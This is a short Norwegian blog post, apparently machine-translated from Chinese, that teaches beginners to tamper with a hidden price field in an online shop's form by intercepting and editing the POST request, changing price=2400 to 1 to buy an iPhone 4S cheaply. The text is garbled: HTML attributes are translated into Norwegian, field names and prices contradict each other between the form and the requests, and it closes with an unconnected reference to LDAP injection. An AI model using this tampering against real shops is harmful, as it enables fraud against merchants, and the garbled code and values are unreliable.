Intrusjonspenetrasjon: Bruk av HTTP-headere

Admin · Publisert på 07.02.2015 17:59:07

Om bruken av HTTP-headere

HTTP-headeren brukes ofte i overføringsmekanismen til nettsteder, men de fleste nybegynnere i Kina har ikke lagt merke til dette. Denne artikkelen er kun dedikert til nybegynnere, http-headerens rolle i inntrengningsprosessen.

Ta handlesiden som et eksempel for å analysere en liten del av rollen til HTTP-headere.

La oss først analysere et skjema på handlesiden.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br /> 

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<inputtype="skjult" navn="pris" verdi="449">

<inputtype="send inn" verdi="Kjøp">

</form>

Under åpningsprosessen, ta et skjermbilde av http-meldingsheaderen hans og ta en titt

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kvantitet=1&price=2400

Selv om prisfeltet ikke vises på siden når handlesiden åpnes, kan det fortsatt redigeres og betjenes av brukeren.

Det finnes to måter å oppnå redigering på

1. Lagre HTML-kildekoden for endring, og last den deretter inn i nettleseren for å kjøre den

2. Bruk proxy-avskjæring for å endre HTTP-headere (proxy-konstruksjon i Tool Burp)

Ta HTTP-headeren ovenfor som et eksempel
Før endringen
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kvantitet=1&price=2400

Etter endringen
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kvantitet=1&pris=1

I siste linje har feltet Price en verdi på 2400, og hvis vi endrer det til 1, kan vi få iPhone 4S til en lavere pris.

Denne artikkelen gir kun en idé om uventede gevinster som LDAP-injeksjon.

[Sikkerhetsveiledning] Intrusjonspenetrasjon: Bruk av HTTP-headere

Relaterte innlegg

Seksjoner sett